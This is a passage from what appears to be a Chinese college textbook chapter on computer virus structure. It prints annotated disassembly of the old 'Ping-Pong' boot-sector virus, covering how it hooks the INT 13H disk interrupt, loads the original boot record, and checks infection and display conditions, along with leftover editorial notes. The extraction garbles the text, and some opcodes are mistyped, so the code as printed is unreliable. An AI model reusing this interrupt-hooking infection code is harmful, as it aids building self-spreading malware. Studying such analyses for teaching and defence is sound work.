∶
7C66 B8C0FF MOV AX
，
FFC0
；
FFC0 + 8000 =7C00(
不计溢出
)
97C0
∶
7C69 8EC0 MOV ES
，
AX
97C0
∶
7C6B E82F00 CALL 7C9D
；读原引导记录到
0000
∶
7C00H
中

97C0
∶
7C6E 33C0 XOR AX
，
AX
97C0
∶
7C70 A2F77D MOV [ 7DF7]
，
AL
97C0
∶
7C73 8ED8 MOV DS
，
AX
97C0
∶
7C75 A14C00 MOV AX
，
[ 004C]
97C0
∶
7C78 8B1E4E00 MOV BX
，
[ 004E]
；
取
I NT 13H
中断向量→
BX
，
AX
97C0
∶
7C7C C7064C00D0 MOV WORD PTR[ 4C]
，
7CD0
97C0
∶
7C82 8C0E4E00 MOV [ 004E]
，
CS
；改
INT 13H
中断向量为：
CS
∶
7CD0
97C0
∶
7C86 0E PUSH CS
；保留原
INT 13H
中断向量

97C0
∶
7C87 1F POP DS
97C0
∶
7C88 A32A7D MOV [ 7D2A]
，
AX
；原向量移→
[ DS
∶
7D2A]
97C0
∶
7C8B 891E2C7D MOV [ 7D2C]
，
BX
；段地址→
[ DS
∶
7D2C]
97C0
∶
7C8F 8A16F87D MOV DL
，
[ 7DF8]
97C0
∶
7C93 EA007C0000 JMP 0000
∶
7C00
；把控制权交给原
DOS
引导程序

97C0
∶
7C98 B80103 MOV AX
，
0301
；写盘模块

97C0
∶
7C9B EB03 JMP 7CA0
；

97C0
∶
7C9D B80102 MOV AX
，
0201
；读盘模块

97C0
∶
7CA0 93 XCHG BX
，
AX

18
第三章

计算机病毒的结构和作用机制

97C0
∶
7CA1 03061C7C ADD AX
，
[ 7C1C]
；
[ 7C1C] =
隐藏扇区数

97C0
∶
7CA5 33D2 XOR DX
，
DX
97C0
∶
7CA7 F736187C DI V WORD PTR [ 7C18]
；
[ 7C18] =
每道扇区数

97C0
∶
7CAB FEC2 I NC DL
97C0
∶
7CAD 8AEA MOV CH
，
DL
97C0
∶
7CAF 33D2 XOR DX
，
DX
97C0
∶
7CB1 F7361A7C DI V WORD PTR[ 7C1A]
；
[ 7C1A] =
磁头数
97C0
∶
7CB5 B106 MOV CL
，
06
97C0
∶
7CB7 D2E4 SHL AH
，
CL
97C0
∶
7CB9 0AE5 OR AH
，
CH
97C0
∶
7CBB 8BC8 MOV CX ,AX
97C0
∶
7CBD 86E9 XCHG CL
，
CH
97C0
∶
7CBF 8AF2 MOV DH
，
DL
97C0
∶
7CC1 8BC3 MOV AX
，
BX
97C0
∶
7CC3 8A16F87D MOV DL
，
[ 7DF8]
；读写磁盘的子程序

97C0
∶
7CC7 BB0080 MOV BX
，
8000
97C0
∶
7CCA CD13 I NT 13
97C0
∶
7CCC 7301 JNB 7CCF
97C0
∶
7CCE 58 POP AX
97C0
∶
7CCF C3 RET
. . . . . . . . .
19


淮安信息职业技术学院

3.4
病毒的感染部分

3.4.1
病毒的感染模块及感染机制

感染模块主要完成病毒的动态感染，是各种病毒必不可少的模块。各种病毒
感染模块大同小异，区别主 要在于感染条件。病毒在取得对系统的控制权后，先
执行它的感染操作中的条件判断模块，
判断 感染条件是否满足
(
如每次打开新的文
件、程序或对磁盘进行操作时，病毒就会检查是 否为特定的文件、程序，或寻找
文件、
程序或磁盘等介质中是否有感染标记，
是否为特 定系统的时间、
日期等
)
；
如果满足感染条件，进行感染，将病毒代码入宿主程序；然后再执行其他的操作
(
如执行病毒的表现
(
破坏
)
模块
)
，
最后再执行系统正确的处理，
这是病毒感染
经常采取的手段之一。

3.4.2
感染部分程序的举例

例：
“小球”病毒的感染部分的片段

在系统启动过程中，病毒程序的引导模 块完成了整个病毒程序的加载，并使
得病毒程序的感染模块处于激活状态，在系统运行过程中，一旦发生 了
I NT 13H
中断，病毒程序的感染模块即被执行，其执行流程如图
3 .2
所示。


20
第三章

计算机病毒的结构和作用机制






图
3.2

小球病毒感染模块执行流程

这个图重画

下面是
“小球”
病毒感染模块和表现模块的判断程序部分，
由
INT 13H
指向。

代码少写，或者不写，只要说明原理就行了，如果你完全明白他的意 思也可
以写。代码的字体比正文小一号。
。
。
。
。

97C0
∶
7CD0 1E PUSH DS
；
7CD0
～
7CD9H
为修改后的

97C0
∶
7CD1 06 PUSH ES
；
I NT 13H
中断服务程序


21
淮安信息职业技术学院

97C0
∶
7CD2 50 PUSH AX
97C0
∶
7CD3 53 PUSH BX
97C0
∶
7CD4 51 PUSH CX
97C0
∶
7CD5 52 PUSH DX
97C0
∶
7CD6 0E PUSH CS
97C0
∶
7CD7 1F POP DS
97C0
∶
7CD8 0E PUSH CS
97C0
∶
7CD9 07 POP ES
97C0
∶
7CDA F606F77D01 TEST BYTE PTR [7DF7]
，
01
；是否感染状态

97C0
∶
7CDF 7542 JNZ 7D23
97C0
∶
7CE1 80FC02 CMP AH
，
02
；是否读盘操作

97C0
∶
7CE4 753D JMZ 7D23
97C0
∶
7CE6 3816F87D CMP [ 7DF8]
，
DL
；驱动器号是否一致

97C0
∶
7CEA 8816F87D MOV [ 7DF8]
，
DL
97C0
∶
7CEE 7522 JNZ 7D12
；不是则转
7D12H
97C0
∶
7CF0 32E4 XOR AH
，
AH
97C0
∶
7CF2 CD1A I NT 1A
；读时钟计数值

97C0
∶
7CF4 F6C67F TEST DH
，
7F
97C0
∶
7CF7 750A JNZ 7D03
97C0
∶
7CF9 F6C2F0 TEST DL
，
F0
；
7CE1
～
7CFEH
为表现模块的判断

97C0
∶
7CFC 7 505 JNZ 7D03
；部分是否连续两次读同一盘且满足

97C0
∶
7CFE 52 PUSH DX
；整点或半点的时间条件

97C0
∶
7CFF E8B101 CALL 7EB3
；满足条件，执行表现模块

97C0
∶
7D02 5A POP DX

22